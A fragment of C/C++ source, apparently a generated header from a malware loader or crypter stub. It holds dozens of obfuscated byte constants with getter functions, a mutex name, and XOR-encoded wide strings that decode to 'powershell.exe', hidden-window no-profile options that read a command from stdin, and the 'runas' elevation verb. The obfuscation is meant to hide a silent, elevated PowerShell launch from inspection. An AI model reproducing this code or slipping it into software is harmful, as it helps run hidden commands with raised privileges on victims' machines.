extern uint8_t __stdcall __MDZlNDY0NDC__g(){ return __MDZlNDY0NDC_; };
static const uint8_t __ZTQ2NDQwYmVp=0xE4;
extern uint8_t __stdcall __ZTQ2NDQwYmVp_g(){ return __ZTQ2NDQwYmVp; };
static const uint8_t __NjQ0MGJlNjlS=0x64;
extern uint8_t __stdcall __NjQ0MGJlNjlS_g(){ return __NjQ0MGJlNjlS; };
static const uint8_t __NDBiZTY5NTJJ=0x40;
extern uint8_t __stdcall __NDBiZTY5NTJJ_g(){ return __NDBiZTY5NTJJ; };
static const uint8_t __YmU2OTUyNDmM=0xBE;
extern uint8_t __stdcall __YmU2OTUyNDmM_g(){ return __YmU2OTUyNDmM; };
static const uint8_t __Njk1MjQ5OGON=0x69;
extern uint8_t __stdcall __Njk1MjQ5OGON_g(){ return __Njk1MjQ5OGON; };
static const uint8_t __NTI0OThjOGTM=0x52;
extern uint8_t __stdcall __NTI0OThjOGTM_g(){ return __NTI0OThjOGTM; };
static const uint8_t __NDk4YzhkY2Nu=0x49;
extern uint8_t __stdcall __NDk4YzhkY2Nu_g(){ return __NDk4YzhkY2Nu; };
static const uint8_t __OGM4ZGNjNmVC=0x8C;
extern uint8_t __stdcall __OGM4ZGNjNmVC_g(){ return __OGM4ZGNjNmVC; };
static const uint8_t __OGRjYzZlNDJI=0x8D;
extern uint8_t __stdcall __OGRjYzZlNDJI_g(){ return __OGRjYzZlNDJI; };
static const uint8_t __Y2M2ZTQyNDgX=0xCC;
extern uint8_t __stdcall __Y2M2ZTQyNDgX_g(){ return __Y2M2ZTQyNDgX; };
static const uint8_t __NmU0MjQ4MTdO=0x6E;
extern uint8_t __stdcall __NmU0MjQ4MTdO_g(){ return __NmU0MjQ4MTdO; };
static const uint8_t __NDI0ODE3NGUx=0x42;
extern uint8_t __stdcall __NDI0ODE3NGUx_g(){ return __NDI0ODE3NGUx; };
static const uint8_t __NDgxNzRlMzE_=0x48;
extern uint8_t __stdcall __NDgxNzRlMzE__g(){ return __NDgxNzRlMzE_; };
static const uint8_t __MTc0ZTMxM2XD=0x17;
extern uint8_t __stdcall __MTc0ZTMxM2XD_g(){ return __MTc0ZTMxM2XD; };
static const uint8_t __NGUzMTNlYzP8=0x4E;
extern uint8_t __stdcall __NGUzMTNlYzP8_g(){ return __NGUzMTNlYzP8; };
static const uint8_t __MzEzZWMzZmN9=0x31;
extern uint8_t __stdcall __MzEzZWMzZmN9_g(){ return __MzEzZWMzZmN9; };
static const uint8_t __M2VjM2ZjN2Tg=0x3E;
extern uint8_t __stdcall __M2VjM2ZjN2Tg_g(){ return __M2VjM2ZjN2Tg; };
static const uint8_t __YzNmYzdkZTCU=0xC3;
extern uint8_t __stdcall __YzNmYzdkZTCU_g(){ return __YzNmYzdkZTCU; };
static const uint8_t __ZmM3ZGUwOTTS=0xFC;
extern uint8_t __stdcall __ZmM3ZGUwOTTS_g(){ return __ZmM3ZGUwOTTS; };
static const uint8_t __N2RlMDk0ZDKn=0x7D;
extern uint8_t __stdcall __N2RlMDk0ZDKn_g(){ return __N2RlMDk0ZDKn; };
static const uint8_t __ZTA5NGQyYTdK=0xE0;
extern uint8_t __stdcall __ZTA5NGQyYTdK_g(){ return __ZTA5NGQyYTdK; };
static const uint8_t __OTRkMmE3NGHx=0x94;
extern uint8_t __stdcall __OTRkMmE3NGHx_g(){ return __OTRkMmE3NGHx; };
static const uint8_t __ZDJhNzRhZjGI=0xD2;
extern uint8_t __stdcall __ZDJhNzRhZjGI_g(){ return __ZDJhNzRhZjGI; };
static const uint8_t __YTc0YWYxODgP=0xA7;
extern uint8_t __stdcall __YTc0YWYxODgP_g(){ return __YTc0YWYxODgP; };
static const uint8_t __NGFmMTg4MGbZ=0x4A;
extern uint8_t __stdcall __NGFmMTg4MGbZ_g(){ return __NGFmMTg4MGbZ; };
static const uint8_t __ZjE4ODBmZDnP=0xF1;
extern uint8_t __stdcall __ZjE4ODBmZDnP_g(){ return __ZjE4ODBmZDnP; };
static const uint8_t __ODgwZmQ5Y2ao=0x88;
extern uint8_t __stdcall __ODgwZmQ5Y2ao_g(){ return __ODgwZmQ5Y2ao; };
static const uint8_t __MGZkOWNmYThv=0x0F;
extern uint8_t __stdcall __MGZkOWNmYThv_g(){ return __MGZkOWNmYThv; };
static const uint8_t __ZDljZmE4NmYh=0xD9;
extern uint8_t __stdcall __ZDljZmE4NmYh_g(){ return __ZDljZmE4NmYh; };
static const uint8_t __Y2ZhODZmMjFx=0xCF;
extern uint8_t __stdcall __Y2ZhODZmMjFx_g(){ return __Y2ZhODZmMjFx; };
static const uint8_t __YTg2ZjIxNzFs=0xA8;
extern uint8_t __stdcall __YTg2ZjIxNzFs_g(){ return __YTg2ZjIxNzFs; };
static const uint8_t __NmYyMTcxNmNh=0x6F;
extern uint8_t __stdcall __NmYyMTcxNmNh_g(){ return __NmYyMTcxNmNh; };
static const uint8_t __MjE3MTZjNjEC=0x21;
extern uint8_t __stdcall __MjE3MTZjNjEC_g(){ return __MjE3MTZjNjEC; };
static const uint8_t __NzE2YzYxMDLs=0x71;
extern uint8_t __stdcall __NzE2YzYxMDLs_g(){ return __NzE2YzYxMDLs; };
static const uint8_t __NmM2MTAyZWOA=0x6C;
extern uint8_t __stdcall __NmM2MTAyZWOA_g(){ return __NmM2MTAyZWOA; };
static const uint8_t __NjEwMmVjODCl=0x61;
extern uint8_t __stdcall __NjEwMmVjODCl_g(){ return __NjEwMmVjODCl; };
static const uint8_t __MDJlYzgwYTXh=0x02;
extern uint8_t __stdcall __MDJlYzgwYTXh_g(){ return __MDJlYzgwYTXh; };
static const uint8_t __ZWM4MGE1ZTEW=0xEC;
extern uint8_t __stdcall __ZWM4MGE1ZTEW_g(){ return __ZWM4MGE1ZTEW; };
static const uint8_t __ODBhNWUxMTaO=0x80;
extern uint8_t __stdcall __ODBhNWUxMTaO_g(){ return __ODBhNWUxMTaO; };
static const uint8_t __YTVlMTE2OGU0=0xA5;
extern uint8_t __stdcall __YTVlMTE2OGU0_g(){ return __YTVlMTE2OGU0; };
static const uint8_t __ZTExNjhlMzTj=0xE1;
extern uint8_t __stdcall __ZTExNjhlMzTj_g(){ return __ZTExNjhlMzTj; };
static const uint8_t __MTY4ZTM0ZTN7=0x16;
extern uint8_t __stdcall __MTY4ZTM0ZTN7_g(){ return __MTY4ZTM0ZTN7; };
static const uint8_t __OGUzNGUzN2Jq=0x8E;
extern uint8_t __stdcall __OGUzNGUzN2Jq_g(){ return __OGUzNGUzN2Jq; };
static const uint8_t __MzRlMzdiNmG_=0x34;
extern uint8_t __stdcall __MzRlMzdiNmG__g(){ return __MzRlMzdiNmG_; };
static const uint8_t __ZTM3YjZhYmYa=0xE3;
extern uint8_t __stdcall __ZTM3YjZhYmYa_g(){ return __ZTM3YjZhYmYa; };
static const uint8_t __N2I2YWJmMWGZ=0x7B;
extern uint8_t __stdcall __N2I2YWJmMWGZ_g(){ return __N2I2YWJmMWGZ; };
static const uint8_t __NmFiZjFhOTks=0x6A;
extern uint8_t __stdcall __NmFiZjFhOTks_g(){ return __NmFiZjFhOTks; };
static const uint8_t __YmYxYTk5MmMH=0xBF;
extern uint8_t __stdcall __YmYxYTk5MmMH_g(){ return __YmYxYTk5MmMH; };
static const uint8_t __MWE5OTJjMDeT=0x1A;
extern uint8_t __stdcall __MWE5OTJjMDeT_g(){ return __MWE5OTJjMDeT; };
static const uint8_t __OTkyYzA3OTNQ=0x99;
extern uint8_t __stdcall __OTkyYzA3OTNQ_g(){ return __OTkyYzA3OTNQ; };
static const uint8_t __MmMwNzkzNTCi=0x2C;
extern uint8_t __stdcall __MmMwNzkzNTCi_g(){ return __MmMwNzkzNTCi; };
static const uint8_t __MDc5MzUwYTKF=0x07;
extern uint8_t __stdcall __MDc5MzUwYTKF_g(){ return __MDc5MzUwYTKF; };
static const uint8_t __OTM1MGEyODUq=0x93;
extern uint8_t __stdcall __OTM1MGEyODUq_g(){ return __OTM1MGEyODUq; };
static const uint8_t __NTBhMjg1MmEg=0x50;
extern uint8_t __stdcall __NTBhMjg1MmEg_g(){ return __NTBhMjg1MmEg; };
static const uint8_t __YTI4NTJhMjAv=0xA2;
extern uint8_t __stdcall __YTI4NTJhMjAv_g(){ return __YTI4NTJhMjAv; };
static const uint8_t __ODUyYTIwMma2=0x85;
extern uint8_t __stdcall __ODUyYTIwMma2_g(){ return __ODUyYTIwMma2; };
static const wchar_t imutex[]=L"HgxczNXMlZ62";
#define STRMAX 22
static wchar_t xchr[]={
0x46d9,0x67c4,0x3b5c,0xdb46,0x6a52,0x6862,
0x21ca,0xd87f,0xdf64,0x7e53,0xc4c2,0xfefd,
0x43ee,0x9545,0xb2ce,0x3cd4,0x75ac,0x901e,
0xd497,0x8202,0xe484,0xd49e
};
static wchar_t cmd[]={
0x46a9,0x67ab,0x3b2b,0xdb23,0x6a20,0x6811,
0x21a2,0xd81a,0xdf08,0x7e3f,0xc4ec,0xfe98,
0x4396,0x9520,0xb2ce,0x3cd4,0x75ac,0x901e,
0xd497,0x8202,0xe484,0xd49e
};
static wchar_t opt[]={
0x46f9,0x67e9,0x3b2b,0xdb66,0x6a61,0x6842,
0x21e7,0xd811,0xdf0b,0x7e3f,0xc4e2,0xfed0,
0x4380,0x952a,0xb2be,0x3cf4,0x7581,0x907d,
0xd4b7,0x822f,0xe484,0xd49e
};
static wchar_t vrb[]={
0x46ab,0x67b1,0x3b32,0xdb27,0x6a21,0x6862,
0x21ca,0xd87f,0xdf64,0x7e53,0xc4c2,0xfefd,
0x43ee,0x9545,0xb2ce,0x3cd4,0x75ac,0x901e,
0xd497,0x8202,0xe484,0xd49e
};
#endif
